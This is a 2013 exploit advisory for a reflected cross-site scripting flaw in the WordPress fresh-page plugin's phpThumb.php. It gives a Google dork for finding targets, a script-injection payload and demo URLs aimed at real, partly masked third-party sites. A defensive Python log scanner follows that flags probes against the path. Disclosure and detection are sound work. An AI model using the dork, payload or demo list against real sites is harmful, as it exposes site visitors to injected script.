
Wordpress fresh-page plugin site scripting Vulnerability

Posted on 04 November 2013

====================================================================
# Exploit Title : Wordpress fresh-page plugin site scripting Vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://wordpress.org
# Google Dork : inurl:wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php
# Date: 2013/11/02
# Tested on: Windows 7
# ------------------------------------------------
#
# Exploit :
#
# Location : www.Site.com/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src=[xss]
#
# Method : Get
#
# Script For Test : "/><script>alert(1);</script>
# ------------------------------------------------
#
# Demo:
#
# http://www.arXXibel.ru/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src="/><script>alert(1);</script>
#
# http://lsgroXXup.org/building/en/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src="/><script>alert(1);</script>
#
# http://feelinnveniXXce.com/zh/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src="/><script>alert(1);</script>
#
# http://floortoceilinXXghandyman.com/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src="/><script>alert(1);</script>
#
# http://intentionaXl.Xco.uk/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src="/><script>alert(1);</script>
#
# http://meiasrikaXcom.br/site/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src="/><script>alert(1);</script>
#
# http://www.drtv.XXco.uk/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src="/><script>alert(1);</script>
#
# http://www.thXXebuildersandthebutchers.com/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src="/><script>alert(1);</script>
#
# http://www.ilXveyes.net/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src="/><script>alert(1);</script>
#
######################
discovered by : ACC3SS
######################
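The advisory gives defenders two concrete indicators: the affected path (the bundled phpThumb.php under the fresh-page plugin) and the fact that the reflected value travels in the src GET parameter. The script below, added here as an example and not part of the advisory or the plugin, turns those into a log check: it parses combined-format web access log lines, URL-decodes the src parameter (twice, since probes are sometimes double-encoded), and flags requests to that path whose src contains HTML markup characters. The log lines, IP addresses and timestamps are constructed for illustration.

```python
"""Flag reflected-XSS probes against the fresh-page phpThumb endpoint in access logs.

Added example for this advisory; not the plugin's code. Log lines are constructed.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint path named in the advisory.
TARGET_PATH = "/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php"

# Apache/nginx "combined" format: client, ident, user, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Characters that only matter if the value is reflected unescaped into HTML.
MARKUP_RE = re.compile(r"[<>\"']")

# Constructed sample log: one benign thumbnail request, one probe using the
# advisory's test string, one double-encoded probe, one unrelated request.
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Nov/2013:10:15:01 +0000] "GET ' + TARGET_PATH +
    '?src=images%2Fheader.jpg&w=300 HTTP/1.1" 200 5123',
    '198.51.100.7 - - [04/Nov/2013:10:16:42 +0000] "GET ' + TARGET_PATH +
    '?src=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E HTTP/1.1" 200 812',
    '198.51.100.7 - - [04/Nov/2013:10:16:43 +0000] "GET ' + TARGET_PATH +
    '?src=%2522%252F%253E%253Cscript%253E HTTP/1.1" 200 812',
    '192.0.2.9 - - [04/Nov/2013:10:17:00 +0000] "GET /index.php?s=%3Cscript%3E HTTP/1.1" 200 2048',
]


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_xss_probe(entry):
    """True if the request hits the phpThumb endpoint with markup in ``src``."""
    target = urlsplit(entry["target"])
    if not target.path.endswith(TARGET_PATH):
        return False
    # parse_qs decodes once; decode twice more so %2522 -> %22 -> " is still caught.
    for value in parse_qs(target.query).get("src", []):
        if MARKUP_RE.search(unquote(unquote(value))):
            return True
    return False


def flag_probes(lines):
    """Return (ip, timestamp, raw target) for every line that looks like a probe."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry and is_xss_probe(entry):
            hits.append((entry["ip"], entry["ts"], entry["target"]))
    return hits


if __name__ == "__main__":
    for ip, ts, target in flag_probes(SAMPLE_LOG):
        print(f"{ts} {ip} {target}")
```

Run it against a real access log by replacing SAMPLE_LOG with the file's lines; a hit means the endpoint is reachable and being probed, which is the cue to remove or update the plugin (or block the phpThumb path at the web server) rather than rely on the response status, since the reflected payload comes back with a 200.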
